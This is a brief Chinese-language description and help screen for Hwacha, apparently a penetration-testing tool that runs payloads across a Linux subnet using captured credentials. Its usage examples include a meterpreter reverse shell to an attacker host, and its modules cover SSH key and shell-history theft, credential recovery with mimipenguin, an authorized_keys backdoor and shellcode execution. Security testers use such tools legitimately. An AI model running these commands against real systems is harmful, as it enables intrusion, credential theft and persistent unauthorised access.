
https://www.n00py.io/2017/12/raining-shells-on-linux-environments-with-hwacha/
Hwacha是一个用于在*Nix系统中快速执行载荷的工具。轻松收集工件或在已获取凭据的整个子网系统上执行Shellcode。
$python hwacha.py
&&&& && && &&
&&&&&&&&&&&& && && && Created by Esteban Rodriguez /~~\_
&&&&&& && &&&&&&&&&& && Web: https://www.n00py.io /| '` *\
&& && &&&&& && &&&&& Twitter: @n00py1 \| ___/
&& && &&&&& && && &&&&& _ _ _
&& && && && && && | | | | | |
&&&&&& && &&& &&& && | |_| |__ ____ _ ___| |__ __ _
&& && && && && | _ |\ \ /\ / / _` |/ __| '_ \ / _` |
&&&&&&&&&&&&&&& && | | | | \ V V / (_| | (__| | | | (_| |
&& && \_| |_/ \_/\_/ \__,_|\___|_| |_|\__,_|
使用 -x [COMMAND] 运行命令
使用 -m [MODULE] 运行模块
使用 -o [ARG=ARG ARG=ARG] 指定模块选项
使用 -L 查看所有可用模块
示例用法:
python hwacha.py -t 192.168.1.1/24 -u admin -p password
python hwacha.py -t 192.168.1.100-200 -u admin -p password -m keys
python hwacha.py -t 192.168.1.100-200 -u admin -i loot/keys/192.168.1.101/id_rsa -x id
python hwacha.py -t 192.168.1.123 -u admin -p password -m meterpreter -o "LPORT=4444 LHOST=192.168.1.150 TYPE=64"
可用模块:
[*] meterpreter 在目标上执行meterpreter代理。
必需参数:LHOST , LPORT
可选参数:TYPE {python, php, 32, 64, osx}
[*] mimipenguin 在目标上执行mimipenguin以恢复凭据。(需要root权限)
可选参数:LISTEN
[*] keys 从目标上收集SSH私钥。
[*] history 从目标上收集Shell历史文件。
[*] privs 枚举目标上的sudo权限。
[*] backdoor 生成RSA密钥对并将公钥添加到目标的authorized_keys文件中。
[*] web_delivery 在目标上执行Python脚本。
必需参数:PATH
可选参数:LISTEN
[*] custom_bin 在目标上执行自定义二进制文件。
必需参数:PATH
[*] sudo_exec 在目标上使用sudo执行自定义二进制文件。
必需参数:PATH
[*] shellcode 在目标上执行自定义Shellcode。
必需参数:PATH
需要 paramiko:
pip install paramiko